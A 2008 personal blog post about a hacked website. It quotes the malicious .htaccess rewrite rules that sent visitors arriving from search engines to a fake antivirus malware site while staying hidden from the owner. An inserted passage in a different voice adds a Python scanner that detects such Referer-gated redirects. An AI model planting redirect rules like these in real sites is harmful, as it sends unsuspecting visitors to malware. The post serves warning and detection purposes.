My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting were also hacked.

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.
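Because the redirect only fires for visitors arriving with a search-engine Referer, the owner's own visits will not reveal it, so the file itself has to be inspected. The following is an added example, not code from the original post: a Python scan of .htaccess text for rewrite rules that are gated on %{HTTP_REFERER} and either redirect or point off-site. The sample files, the placeholder.invalid target and the function name find_referer_redirects are constructed for illustration.

```python
import re
import shlex

# Constructed sample modelled on the rules quoted above. The page does not
# show the redirect target, so a placeholder host stands in for it.
INFECTED = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://placeholder.invalid/scan [R,L]
"""

# Constructed benign file: a front-controller rewrite with no Referer test.
BENIGN = r"""
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /index.php?q=$1 [L]
"""

def find_referer_redirects(text, own_hosts=()):
    """Flag RewriteRules that are gated on the Referer header and either
    issue a redirect ([R]) or point at a host not listed in own_hosts."""
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            parts = shlex.split(line)
        except ValueError:          # unbalanced quotes: skip the line
            continue
        name = parts[0].lower()     # Apache directive names are case-insensitive
        if name == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif name == "rewriterule":
            args = parts[2:]
            # A rule whose target was stripped leaves the flags in its place.
            target = args[0] if args and not args[0].startswith("[") else ""
            flags = {f.split("=")[0].upper()
                     for a in args if a.startswith("[")
                     for f in a.strip("[]").split(",")}
            host = re.match(r"https?://([^/:]+)", target, re.I)
            offsite = bool(host) and host.group(1).lower() not in own_hosts
            referers = [pat for var, pat in conds if "HTTP_REFERER" in var.upper()]
            if referers and (offsite or flags & {"R", "REDIRECT"}):
                findings.append({"line": lineno, "target": target,
                                 "referer_patterns": referers})
            conds = []              # conditions apply only to the next rule
    return findings
```

Legitimate Referer-based rules exist (hotlink protection, for instance, which this check does not flag), so each finding is something to compare against a known-good copy of the file.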

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breach wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

14 November 2008
